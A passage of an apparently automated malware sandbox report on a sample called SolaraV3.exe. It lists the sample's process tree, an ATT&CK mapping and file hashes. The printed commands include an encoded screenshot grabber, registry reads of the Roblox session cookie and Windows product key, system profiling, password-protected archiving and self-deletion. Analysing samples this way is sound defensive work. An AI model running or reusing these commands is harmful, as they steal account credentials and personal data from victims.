0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4608
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fqjrtowj\fqjrtowj.cmdline"
        5⤵
        
        PID:3096
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB229.tmp" "c:\Users\Admin\AppData\Local\Temp\fqjrtowj\CSC1F899D33AF0D45B6B905A30D4771182.TMP"
        6⤵
        
        PID:1692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:228
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1224
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4548
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4440
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4512
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1388
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3212
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2608
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1960
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3688
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI45842\rar.exe a -r -hp"2408" "C:\Users\Admin\AppData\Local\Temp\xeXOK.zip" *"
    3⤵
    PID:3420
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:900
  - - C:\Users\Admin\AppData\Local\Temp\_MEI45842\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI45842\rar.exe a -r -hp"2408" "C:\Users\Admin\AppData\Local\Temp\xeXOK.zip" *
      4⤵
      Executes dropped EXE
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:5096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3208
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\SolaraV3.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3916
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:432

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
- Executes dropped EXE
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4776
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkVEQTc5RDgtN0IzRC00NjNBLTlDQTctQzkzNjFFRjI0QTlBfSIgdXNlcmlkPSJ7N0ZGN0Q5QTctNDI5Ri00QjNDLUEzREEtNkREN0M4QTNBOTQ2fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7M0U5OEUxNjgtQzIxRC00QzdCLUE1NkEtOUExNkFERUI0NjBCfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxMDciIGluc3RhbGxkYXRldGltZT0iMTcyODI5MzUzMyIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzcyNzY2MTIzODAzMDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjQ5Mzc3NjI3NjMiLz48L2FwcD48L3JlcXVlc3Q-
  2⤵
  - Executes dropped EXE
  - Checks system information in the registry
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3016
- C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{C188F93F-C2AF-4859-B453-4FE1F72CFD95}\MicrosoftEdge_X64_132.0.2957.115.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{C188F93F-C2AF-4859-B453-4FE1F72CFD95}\MicrosoftEdge_X64_132.0.2957.115.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
  2⤵
  - Executes dropped EXE
  PID:3148
- - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{C188F93F-C2AF-4859-B453-4FE1F72CFD95}\EDGEMITMP_1A402.tmp\setup.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{C188F93F-C2AF-4859-B453-4FE1F72CFD95}\EDGEMITMP_1A402.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{C188F93F-C2AF-4859-B453-4FE1F72CFD95}\MicrosoftEdge_X64_132.0.2957.115.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:216
  - - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{C188F93F-C2AF-4859-B453-4FE1F72CFD95}\EDGEMITMP_1A402.tmp\setup.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{C188F93F-C2AF-4859-B453-4FE1F72CFD95}\EDGEMITMP_1A402.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.84 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{C188F93F-C2AF-4859-B453-4FE1F72CFD95}\EDGEMITMP_1A402.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.115 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff78cf8a818,0x7ff78cf8a824,0x7ff78cf8a830
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      PID:396
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkVEQTc5RDgtN0IzRC00NjNBLTlDQTctQzkzNjFFRjI0QTlBfSIgdXNlcmlkPSJ7N0ZGN0Q5QTctNDI5Ri00QjNDLUEzREEtNkREN0M4QTNBOTQ2fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntDQzM5MDc5Ni00MzI4LTREOEItOUQ2Ni1BREI3QzRFNzcwQjF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMyLjAuMjk1Ny4xMTUiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjQ5NTE4MTI2ODMiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI0OTUxOTEyNzQ0IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTE3ODI5MjY4NyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmYudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvNzI3MmIwY2ItY2E0NS00NDYzLWE4OTUtZjc0NWJmZmRmNDdhP1AxPTE3MzgxNzMzMjAmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9ZUM3VnF0Vk5WVkFJWmF0N1VQZFFrMXdnUHQ0Q3NtY05hbXdrR25qSm0lMmZRNExnQkJBT3d2WCUyYlFwblJzc2RzWmF5RGtMdWpaTTZDRkZuSGlqcGd6OVdBJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTc3MDk4MzM2IiB0b3RhbD0iMTc3MDk4MzM2IiBkb3dubG9hZF90aW1lX21zPSIxNTM5OCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUxNzgzOTI2NDQiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MTkzMTAyNjc2IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzU3IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1ODE5NDAyNjUyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iODUyIiBkb3dubG9hZF90aW1lX21zPSIyMjYzNSIgZG93bmxvYWRlZD0iMTc3MDk4MzM2IiB0b3RhbD0iMTc3MDk4MzM2IiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMCIgaW5zdGFsbF90aW1lX21zPSI2MjYyNyIvPjwvYXBwPjwvcmVxdWVzdD4
  2⤵
  - Executes dropped EXE
  - Checks system information in the registry
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.115\Installer\setup.exe

Filesize
6.6MB

MD5
c2f035293e07aaa688bc9457e695f0f9

SHA1
c5531aa40349601a23b01f8f24f4162958b7ab72

SHA256
704df2272e51fce395c576e4090270e0db7c7562f5b59779d36ca0563505cc91

SHA512
70228567ef097bee2b3e04a5300437adb3615d4217d3a2d08fbef364afbb54e43ffb5dd0e5f3931737d648f56f912ebe35121cc8421354d8c2292fe48f5efc51

Download Submit
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

Filesize
201KB

MD5
70cc35c7fb88d650902e7a5611219931

SHA1
85a28c8f49e36583a2fa9969e616ec85da1345b8

SHA256
7eca199201273f0bcff1e26778cb535e69c74a69064e7759ff8dad86954d42b1

SHA512
3906ddb96b4b1b68b8c2acc940a62c856e8c3415a1b459f17cf2afc09e05751e0086f8e4e5e0ddd8e45cfb61f811bbe4dd96198db68072b45b6379c88d9ea055

Download Submit
C:\Program Files\MsEdgeCrashpad\settings.dat

Filesize
280B

MD5
ae4ee9c10a9bfe3447e16b1ae125de78

SHA1
98539f26bfa3408e720677731dfe58751372cbde

SHA256
2a73fd1980a88daaf20de8f02cc6a1bfb8292ecf87384e9fe274249e7f51a72d

SHA512
984bfda0abcf6bffc4b359c19069ccdb374167c6d6b283e0f0844f419ca35ab1b7427a5c53731a7d3a9f2f672848da00c163903fc442f37addc2a0f8fd6b3dd5

Download Submit
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
80KB

MD5
528e272e6ba12b87cf0d35f746256102

SHA1
4fa3616d189fc2ec6236403ece4a8734682f564f

SHA256
47c5b8da89b1076596f30fbe55bc05cfe1fff86a02442aee6d61aa22ce153bb6

SHA512
b7fa578c32c0aded4ff1c4733700b9dce493f9a3316ea5f9c07d412a61169aaff522a646a6f4d54c1a1173a35304db0fe85de984aa5a329d943363b8c869d558

Download Submit
C:\ProgramData\Solara\Solara.exe

Filesize
613KB

MD5
8fb32e3cdec020f3a15786f74ba6ebde

SHA1
4442aecee3218523ee8a72d26b1085d2e3836ac1

SHA256
c836fa3c4c057e7d05108e4431b9e646dba29f041bed476721ef4f42d51c5f68

SHA512
5ec83a4eb40fd611923ddc4626e78715c0abb8a067ec95b5d597cb6114cdfe47fc55910a8ef8fe4e19d8587a599e460984211bd8f19bfc788c116adb86ee2fbe

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\Crashpad\settings.dat

Filesize
280B

MD5
766ba0d9f848c7befcae6585bcfdbdba

SHA1
6d1b1b17171abc2bfb7f8851521bf627dfe7397a

SHA256
d970c5fff3b200a991f94f70d4f641a8b9ed16fe1b531a4dc72de0277e3db502

SHA512
bc4db06ff5a554d3e801e08b63356eb2184c227ea8edc6ef553f4838433350c0b4305bf87323c478b9864e111c9eb2ce33d6199a19dc4c26dd8f39a38a3b22fd

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\Default\791dff94-550d-41d9-a461-80d862407420.tmp

Filesize
6KB

MD5
699a381e6e533e2d13919c203c8940c1

SHA1
16a839797fff7da6335eb5daa0e828a2e3815a9d

SHA256
6d66127c2621f391be6e4e2049beebe48955a9ebd2e6a890cdf2ed3e0934072e

SHA512
9d4db8ccca0089cff1ca87ef2bdbc81ba2612773eab8eb01ae5e778c6e6ba511b2fa386859dd14d90c916f12e88df5ccc70287032cc519fbb4c2f2bb8caa5886

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\Default\Extension Rules\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\Default\Network\Network Persistent State

Filesize
1KB

MD5
7e7adb3a1ee42a0fc02b35a8557d4397

SHA1
7ff763793da58ada14246644e8f907e4d8f552ba

SHA256
b8b61cf1837c5c39d22847bad5fd69be35a86b478202301b5ef5dc675b9da639

SHA512
811cd52de5dfc0fb9b13fc7ef5443baa6280498b5e2c7b67091edd8ce83cb1de8e0c5371c8b6e9e67127c1c0721f33c4799794065716bb0f8e052f1d3ca8670f

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\Default\Network\Network Persistent State~RFe5998cb.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\Default\Sync Data\LevelDB\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\GrShaderCache\data_0

Filesize
44KB

MD5
96daca06d966e2d146ffa50622dee86c

SHA1
bd7b5caa337d9f5434d51b8052eb440fae72f4c5

SHA256
dc4fcf0d2e511070064f08dcfbbe7adc6b26dfc806255222c3e2545261db5cce

SHA512
a961be16491cb0f648e988c119fcdb10d4442263b1add08dd69e6a7fe6b32ce67f04c05ae4f58b398822e7164799e5f2a22648ab9bad4e0a409ddb0509ab3b36

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\GrShaderCache\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\GrShaderCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\GrShaderCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\Local State

Filesize
1KB

MD5
209f4162186d3f286f0d34f22b55eeca

SHA1
77417e1f6106cae41a0e8cf10af682c4afa7a8fa

SHA256
